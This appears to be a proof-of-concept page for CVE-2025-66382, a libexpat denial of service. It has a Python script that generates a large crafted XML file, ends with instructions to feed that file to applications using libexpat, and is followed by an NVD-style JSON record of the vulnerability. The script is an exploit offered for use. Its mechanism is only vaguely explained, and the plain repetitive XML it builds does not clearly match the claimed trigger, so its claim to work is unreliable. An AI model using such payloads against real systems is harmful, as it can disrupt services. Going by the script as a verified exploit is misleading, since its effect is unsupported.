CVE-2025-66382

#!/usr/bin/env python3 # CVE-2025-66382 PoC - libexpat DoS via large crafted XML file # This PoC generates a specially crafted XML file that triggers # excessive processing time in libexpat <= 2.7.3 def generate_crafted_xml(output_file='cve_2025_66382.xml', size_mb=2): """ Generate a crafted XML file that causes libexpat to spend dozens of seconds processing. The crafted file exploits algorithmic complexity issues in XML entity expansion or attribute processing. """ target_size = size_mb * 1024 * 1024 # Convert MB to bytes with open(output_file, 'w', encoding='utf-8') as f: # XML declaration f.write('<?xml version="1.0" encoding="UTF-8"?>\n') # Root element f.write('<root>\n') current_size = len('<?xml version="1.0" encoding="UTF-8"?>\n<root>\n') # Generate deeply nested or repetitive XML structure # that triggers processing overhead in expat counter = 0 while current_size < target_size: # Use attribute repetition to trigger quadratic behavior attrs = ' '.join([f'attr{i}="value{i}"' for i in range(50)]) f.write(f' <item id="{counter}" {attrs}>Content {counter}</item>\n') current_size += len(f' <item id="{counter}" {attrs}>Content {counter}</item>\n') counter += 1 if counter % 100 == 0: # Add nested elements for additional complexity for depth in range(5): f.write(' ' * (depth + 2) + f'<nested depth="{depth}"/>\n') current_size += len(f' ' * (depth + 2) + f'<nested depth="{depth}"/>\n') f.write('</root>\n') print(f'Generated {output_file} ({current_size / 1024 / 1024:.2f} MB)') print('This file can trigger prolonged processing time in libexpat <= 2.7.3') if __name__ == '__main__': generate_crafted_xml() print('\nUsage: Pass this file to an application using libexpat for XML parsing')

{"cve": {"id": "CVE-2025-66382", "sourceIdentifier": "[email protected]", "published": "2025-11-28T07:15:57.900", "lastModified": "2026-05-12T13:17:23.933", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.4, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.3", "matchCriteriaId": "3DBC21F7-1BF6-4758-B502-23128DDE3C88"}]}]}], "references": [{"url": "https://github.com/libexpat/libexpat/issues/1076", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/02/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}